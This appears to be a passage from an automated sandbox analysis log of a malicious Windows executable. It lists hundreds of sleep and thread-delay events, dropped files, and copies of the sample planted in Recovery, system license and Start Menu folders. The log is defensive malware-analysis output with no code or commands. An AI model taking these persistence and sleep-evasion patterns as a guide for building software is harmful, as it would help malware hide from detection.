                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595818
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595662
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595352
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595078
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594292
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594172
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594051
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593922
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593813
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593697
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593594
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593482
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593375
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 300000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593266
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593155
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593037
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592884
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592779
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592672
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592563
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592453
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592338
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591672
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591533
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591406
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591297
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591078
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590967
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590847
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590719
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590609
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590388
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590268
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2491Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2145Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1914Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2124
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2083
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2421
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeWindow / User API: threadDelayed 4564
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeWindow / User API: threadDelayed 5029
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeDropped PE file which has not been started: C:\Users\user\Desktop\vTqzCdqK.logJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeDropped PE file which has not been started: C:\Users\user\Desktop\nmJRokpY.logJump to dropped file
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\FpFoWZYA.logJump to dropped file
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\CnTGBqTF.logJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe TID: 4108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 2491 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 2145 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep count: 1914 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 2124 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 2083 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 2421 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep count: 92 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 8156Thread sleep time: -30000s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -31359464925306218s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -600000s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599766s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599563s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599406s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599255s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -599110s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598957s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598817s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598649s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 6972Thread sleep time: -14400000s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598469s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598321s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598202s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -598090s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -597979s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -597851s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -597422s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -597063s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596922s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596781s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596668s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596538s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596360s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596188s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -596047s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595937s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595818s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595662s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595500s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595352s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -595078s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -594500s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -594292s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -594172s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -594051s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593922s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593813s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593697s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593594s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593482s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593375s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 6972Thread sleep time: -300000s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593266s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593155s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -593037s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592884s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592779s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592672s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592563s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592453s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592338s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -592188s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591672s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591533s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591406s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591297s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591188s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -591078s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590967s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590847s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590719s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590609s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590500s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590388s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5932Thread sleep time: -590268s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 1900Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 7640Thread sleep time: -30000s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 1460Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe TID: 5024Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5480Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 6296Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 2488Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe TID: 2304Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 1284Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe TID: 2324Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe TID: 6100Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 30000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 600000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599766
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599563
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599406
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599255
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599110
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598957
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598817
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598649
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 3600000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598469
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598321
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598202
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598090
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597979
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597851
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597422
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597063
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596922
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596781
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596668
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596538
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596360
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596047
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595937
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595818
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595662
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595352
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595078
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594292
